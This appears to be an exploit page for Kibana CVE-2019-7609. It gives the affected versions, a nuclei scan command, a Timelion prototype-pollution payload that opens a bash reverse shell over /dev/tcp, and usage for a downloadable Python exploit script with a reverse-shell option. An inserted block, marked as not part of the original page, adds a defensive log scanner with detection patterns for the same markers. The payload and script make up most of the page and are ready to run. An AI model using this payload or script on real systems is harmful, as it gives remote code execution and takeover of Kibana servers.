Kibana CVE-2019-7609

## Affected versions

```http
kibana = 5.6.15
kibana <= 6.6.0
```

## POC

```bash
nuclei -tags kibana -t cves/ -l urls.txt
```

## EXP

```javascript
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
```
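
The payload above writes through `label.__proto__` into process environment keys. The following is an added example, not part of the original page or of any project's code: a defender-side scan for those markers in logged Timelion expressions. The `{ts, src, expression}` record shape is an assumption, and the sample records are constructed.

```javascript
// Added example, not from the original page: defender-side scan of Timelion
// expressions for the prototype-pollution markers seen in the payload above.
// The {ts, src, expression} record shape is an assumption; samples are constructed.
const RULES = [
  { id: 'proto-access', re: /__proto__|constructor\s*(?:\.|\[\s*['"])\s*prototype/ },
  { id: 'env-assign', re: /\benv\s*\.\s*[A-Za-z_]\w*\s*=/ },
  { id: 'node-options', re: /NODE_OPTIONS/ },
  { id: 'proc-environ', re: /\/proc\/self\/environ/ },
];

// Undo up to two layers of percent-encoding, then \uXXXX escapes, so encoded
// variants hit the same rules.
function normalize(input) {
  let s = String(input);
  for (let i = 0; i < 2; i++) {
    try {
      const d = decodeURIComponent(s);
      if (d === s) break;
      s = d;
    } catch (e) {
      break; // malformed escape: scan what we have
    }
  }
  return s.replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Ids of every rule that matches the normalized expression.
function scanExpression(expr) {
  const s = normalize(expr);
  return RULES.filter((r) => r.re.test(s)).map((r) => r.id);
}

// Parse JSON log lines; return records that hit at least one rule.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    let rec;
    try { rec = JSON.parse(line); } catch (e) { continue; }
    const rules = scanExpression((rec && rec.expression) || '');
    if (rules.length) hits.push({ ts: rec.ts, src: rec.src, rules });
  }
  return hits;
}

const SAMPLE = [ // constructed records
  ['192.0.2.10', ".es(*).label('cpu')"],
  ['192.0.2.77', ".es(*).props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')"],
  ['192.0.2.78', '.es(*).props(label.%5F%5Fproto%5F%5F.env.X=1)'],
].map(([src, expression]) => JSON.stringify({ ts: '2019-03-01T10:00:00Z', src, expression }));
console.log(scanLog(SAMPLE));
```

The rules are heuristics over the expression text; a hit is a lead for triage, and upgrading past the affected versions remains the fix.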

Script

```bash
python CVE-2019-7609.py -u http://xxx.com -host vps-ip -port vps-port --shell

optional arguments:
  -h, --help         show this help message and exit
  -u URL             such as: http://127.0.0.1:5601
  -host REMOTE_HOST  reverse shell remote host: such as: 1.1.1.1
  -port REMOTE_PORT  reverse shell remote port: such as: 8888
  --shell            reverse shell after verify
```

[Click to download CVE-2019-7609.py](/Gr33kLibrary/download_tool/80/)
